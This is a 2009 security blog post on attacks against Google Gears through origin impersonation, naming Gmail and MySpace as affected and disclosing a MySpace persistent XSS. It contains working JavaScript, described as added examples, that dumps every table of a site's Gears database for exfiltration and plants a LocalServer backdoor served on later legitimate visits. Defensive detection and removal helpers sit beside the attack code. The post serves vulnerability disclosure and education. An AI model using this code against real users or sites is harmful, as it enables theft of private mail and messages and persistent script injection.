Sunday, November 29, 2009

Stealing Databases and Setting Backdoors on Google Gears

Google Gears has two important modules, the LocalServer and the Database. The Database module stores data in a relational (SQLite) database on the user's hard disk, accessible from JavaScript. The LocalServer is like an advanced cache in which files can be stored and then served locally without touching the network. Both are tied to the site's origin: once the user has allowed a site to use Gears, any script running in that origin can open that site's databases and resource stores.

In a browser phishing attack the attacker may be able to serve content as an 'http' site that the victim has already permitted to use Google Gears. Because the permission is bound to the origin, and a plain 'http' origin gives the browser no proof of who is answering for the hostname, whatever the attacker serves under that name inherits the permission. By running JavaScript as mail.google.com, for example, an attacker can read the user's inbox out of the Gears database; the same goes for MySpace private messages. Both sites use 'http' for Google Gears, which is what makes these attacks possible. The MySpace implementation is flawed in a second way: data stored in the Google Gears database is returned to the user without proper encoding, resulting in a persistent XSS. This is probably the first publicly disclosed vulnerability where Google Gears is involved in an XSS.
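What the database theft looks like in code, as an added example that is not from the original post or from Imposter: script running in the impersonated origin opens that origin's Gears database, lists its tables through SQLite's sqlite_master, and pulls a bounded sample of rows from each. The Gears factory is passed in as a parameter rather than read from the global google object so the logic can be exercised outside a browser; the database name 'offline-data' is a placeholder, since every site names its own Gears databases.

```javascript
// Added example, not code from the original post or from the Imposter tool.
// `factory` is google.gears.factory inside a Gears-enabled browser; it is
// passed in explicitly so the same logic can run against a stub elsewhere.

// Return the names of the user tables in the named Gears database.
// Gears keeps each database as an SQLite file, so sqlite_master lists them.
function listGearsTables(factory, dbName) {
  var db = factory.create('beta.database');
  db.open(dbName);
  var tables = [];
  var rs = db.execute(
    "SELECT name FROM sqlite_master WHERE type = 'table' AND name NOT LIKE 'sqlite_%'"
  );
  try {
    while (rs.isValidRow()) {
      tables.push(rs.field(0));
      rs.next();
    }
  } finally {
    rs.close();
    db.close();
  }
  return tables;
}

// Return up to `limit` rows of `table` as plain objects keyed by column name.
function dumpGearsTable(factory, dbName, table, limit) {
  var db = factory.create('beta.database');
  db.open(dbName);
  // An identifier cannot be bound as a parameter. The name came from
  // sqlite_master, but it is still quoted as an SQL identifier, not pasted raw.
  var sql = 'SELECT * FROM "' + table.replace(/"/g, '""') + '" LIMIT ?';
  var rs = db.execute(sql, [limit]);
  var rows = [];
  try {
    while (rs.isValidRow()) {
      var row = {};
      for (var i = 0; i < rs.fieldCount(); i++) {
        row[rs.fieldName(i)] = rs.field(i);
      }
      rows.push(row);
      rs.next();
    }
  } finally {
    rs.close();
    db.close();
  }
  return rows;
}

// Walk every table and collect a bounded sample of each one.
function dumpGearsDatabase(factory, dbName, rowsPerTable) {
  var dump = {};
  var tables = listGearsTables(factory, dbName);
  for (var i = 0; i < tables.length; i++) {
    dump[tables[i]] = dumpGearsTable(factory, dbName, tables[i], rowsPerTable);
  }
  return dump;
}

// Inside a Gears-enabled browser, running as the impersonated origin:
if (typeof google !== 'undefined' && google.gears) {
  // 'offline-data' is a placeholder database name, not any real site's.
  var stolen = dumpGearsDatabase(google.gears.factory, 'offline-data', 50);
  // The attacker's page would now send JSON.stringify(stolen) to its own server.
}
```

Nothing here is specific to the attacker: the same calls are what the site's own offline code makes, which is the whole point. Gears has no notion of which script is "really" the site's, only which origin it runs in, so the only control is the permission prompt, and for an 'http' origin that prompt is answered once for everyone who can later answer for the hostname.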

The LocalServer allows an attacker to cache any file in the victim's browser for a specific site. For example, the attacker could capture a file like 'http://mail.google.com/gearsBackdoor.html' into the victim's LocalServer with malicious content. The attacker can then call that page either by sending the victim a link or by loading it in an iframe when the victim visits the attacker's website. When that happens the page is served from the LocalServer, and the malicious content executes in the context of mail.google.com, long after the attacker has stopped impersonating the site. A more advanced attack is to capture the backdoor under the same URL as a file that is part of the website itself, such as a script the site loads on every page. Every time the user logs in to the website, the backdoor is then loaded automatically instead of the real file. Obviously this kind of attack can have serious consequences for the victim.
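Both sides of the LocalServer backdoor, as an added example that is not from the original post or from Imposter: planting a capture while running as the impersonated origin, and afterwards asking Gears whether a URL would be answered from the local cache and removing it. As in the database example the Gears factory is passed in as a parameter; the store name 'backdoor-store' is a placeholder, and the backdoor URL is the one used in the post.

```javascript
// Added example, not code from the original post or from the Imposter tool.
// `factory` is google.gears.factory inside a Gears-enabled browser; it is
// passed in explicitly so the same logic can run against a stub elsewhere.

// Attacker side: capture `url` into a ResourceStore for the current origin.
// capture() fetches the URL over the network and keeps the response. While
// the attacker is answering for the site's hostname, that response is the
// attacker's, and Gears serves it for the real origin from then on.
// `done(url, success)` is called when the capture finishes.
function plantBackdoor(factory, storeName, url, done) {
  var localServer = factory.create('beta.localserver');
  var store = localServer.createStore(storeName);
  store.capture(url, function (capturedUrl, success, captureId) {
    done(capturedUrl, success);
  });
  return store;
}

// Defender side: Gears does not enumerate what a store holds, but the
// LocalServer will say whether a URL would be answered from the local cache.
// A true result only means "Gears answers this URL"; the site's own offline
// files answer true as well, so the cached copy still has to be compared
// against what the server really serves.
function servedFromGears(factory, url) {
  var localServer = factory.create('beta.localserver');
  return localServer.canServeLocally(url);
}

// Defender side: drop a captured URL from a named store. Returns true if
// something was removed. This only reaches a store whose name is known, and
// an attacker can pick any name, so clearing the site's Gears data or
// revoking its permission is the reliable clean-up.
function removeCapturedUrl(factory, storeName, url) {
  var localServer = factory.create('beta.localserver');
  var store = localServer.openStore(storeName); // null if no such store
  if (!store || !store.isCaptured(url)) {
    return false;
  }
  store.remove(url);
  return true;
}

// Inside a Gears-enabled browser, running as the impersonated origin:
if (typeof google !== 'undefined' && google.gears) {
  var target = 'http://mail.google.com/gearsBackdoor.html';
  plantBackdoor(google.gears.factory, 'backdoor-store', target, function (u, ok) {
    // ok === true: a later visit to `target` is served from the victim's disk.
  });
}
```

To get the automatic variant described above, the attacker passes a URL the site itself loads on every page instead of a fresh file name; from then on the captured copy wins over the network copy for that URL. The capture happens during the impersonation window, but the payload runs on every later, entirely legitimate visit, which is what makes it a backdoor rather than a one-off phishing page.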

I have enumerated seven different types of backdoors that can be placed with Google Gears. Details of these techniques will be in a whitepaper that I will release soon. Imposter can be used both to steal database contents and to place backdoors.
